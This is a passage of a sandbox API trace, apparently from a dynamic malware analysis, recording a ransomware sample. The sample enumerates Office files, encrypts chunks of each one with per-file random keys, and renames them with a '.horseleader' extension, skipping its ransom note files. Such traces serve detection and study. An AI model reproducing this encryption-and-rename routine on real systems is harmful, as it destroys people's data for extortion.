[0244.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.077] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.077] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.079] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.079] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.079] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.079] CloseHandle (hObject=0x158) returned 1 [0244.080] GetProcessHeap () returned 0x780000 [0244.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.080] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.horseleader") returned 82 [0244.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\fltldr.exe.horseleader")) returned 1 [0244.081] GetProcessHeap () returned 0x780000 [0244.081] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.081] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bf3f00, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x53907610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7bf3f00, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x417360, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IACOM2.DLL", cAlternateFileName="")) returned 1 [0244.081] lstrcmpiW (lpString1="IACOM2.DLL", lpString2="Windows") returned -1 [0244.081] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0244.081] StrStrIW (lpFirst="IACOM2.DLL", lpSrch=".horseleader") returned 0x0 [0244.081] lstrcmpW (lpString1="IACOM2.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.081] lstrcmpW (lpString1="IACOM2.DLL", lpString2="_uninstalling_.png") returned 1 [0244.081] lstrlenW (lpString=".testttjffg") returned 11 [0244.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL", lpSrch=".testttjffg") returned 0x0 [0244.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0244.083] StrStrW (lpFirst="IACOM2.DLL", lpSrch=".txt") returned 0x0 [0244.083] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4289376) returned 1 [0244.083] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.084] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.090] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.091] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.091] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2091b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.091] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.095] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x412360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.096] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.099] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.100] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.100] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.100] CloseHandle (hObject=0x158) returned 1 [0244.100] GetProcessHeap () returned 0x780000 [0244.100] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.100] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.horseleader") returned 82 [0244.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.horseleader")) returned 1 [0244.102] GetProcessHeap () returned 0x780000 [0244.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.102] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x31d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0244.102] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="Windows") returned -1 [0244.102] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 70 [0244.102] StrStrIW (lpFirst="LICLUA.EXE", lpSrch=".horseleader") returned 0x0 [0244.102] lstrcmpW (lpString1="LICLUA.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.102] lstrcmpW (lpString1="LICLUA.EXE", lpString2="_uninstalling_.png") returned 1 [0244.102] lstrlenW (lpString=".testttjffg") returned 11 [0244.103] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE", lpSrch=".testttjffg") returned 0x0 [0244.103] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.103] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.103] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 70 [0244.104] StrStrW (lpFirst="LICLUA.EXE", lpSrch=".txt") returned 0x0 [0244.104] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=204168) returned 1 [0244.104] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.104] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.107] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.107] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.108] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x166c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.108] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.109] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.109] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.109] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2cd88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.109] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.110] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.110] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.111] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.111] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.111] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.111] CloseHandle (hObject=0x158) returned 1 [0244.111] GetProcessHeap () returned 0x780000 [0244.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.111] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.horseleader") returned 82 [0244.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\liclua.exe.horseleader")) returned 1 [0244.113] GetProcessHeap () returned 0x780000 [0244.113] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.113] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc821f600, ftCreationTime.dwHighDateTime=0x1cbdfb3, ftLastAccessTime.dwLowDateTime=0xd776b9a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc821f600, ftLastWriteTime.dwHighDateTime=0x1cbdfb3, nFileSizeHigh=0x0, nFileSizeLow=0x183d780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSO.DLL", cAlternateFileName="")) returned 1 [0244.113] lstrcmpiW (lpString1="MSO.DLL", lpString2="Windows") returned -1 [0244.113] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0244.113] StrStrIW (lpFirst="MSO.DLL", lpSrch=".horseleader") returned 0x0 [0244.113] lstrcmpW (lpString1="MSO.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.113] lstrcmpW (lpString1="MSO.DLL", lpString2="_uninstalling_.png") returned 1 [0244.113] lstrlenW (lpString=".testttjffg") returned 11 [0244.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL", lpSrch=".testttjffg") returned 0x0 [0244.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0244.114] StrStrW (lpFirst="MSO.DLL", lpSrch=".txt") returned 0x0 [0244.114] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=25417600) returned 1 [0244.114] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.114] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.118] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.118] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.120] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc1c3c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.120] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.122] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.122] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.122] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1838780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.122] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.125] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.125] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.126] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.126] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.126] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.126] CloseHandle (hObject=0x158) returned 1 [0244.126] GetProcessHeap () returned 0x780000 [0244.127] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.127] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.horseleader") returned 79 [0244.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.horseleader")) returned 1 [0244.128] GetProcessHeap () returned 0x780000 [0244.128] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.128] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee94c400, ftCreationTime.dwHighDateTime=0x1cb7007, ftLastAccessTime.dwLowDateTime=0xd6225500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xee94c400, ftLastWriteTime.dwHighDateTime=0x1cb7007, nFileSizeHigh=0x0, nFileSizeLow=0x73b60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOICONS.EXE", cAlternateFileName="")) returned 1 [0244.128] lstrcmpiW (lpString1="MSOICONS.EXE", lpString2="Windows") returned -1 [0244.128] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0244.128] StrStrIW (lpFirst="MSOICONS.EXE", lpSrch=".horseleader") returned 0x0 [0244.128] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.128] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="_uninstalling_.png") returned 1 [0244.128] lstrlenW (lpString=".testttjffg") returned 11 [0244.128] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE", lpSrch=".testttjffg") returned 0x0 [0244.129] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.129] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0244.131] StrStrW (lpFirst="MSOICONS.EXE", lpSrch=".txt") returned 0x0 [0244.131] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=473952) returned 1 [0244.131] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.131] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.135] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.136] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x375b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.136] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.138] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, 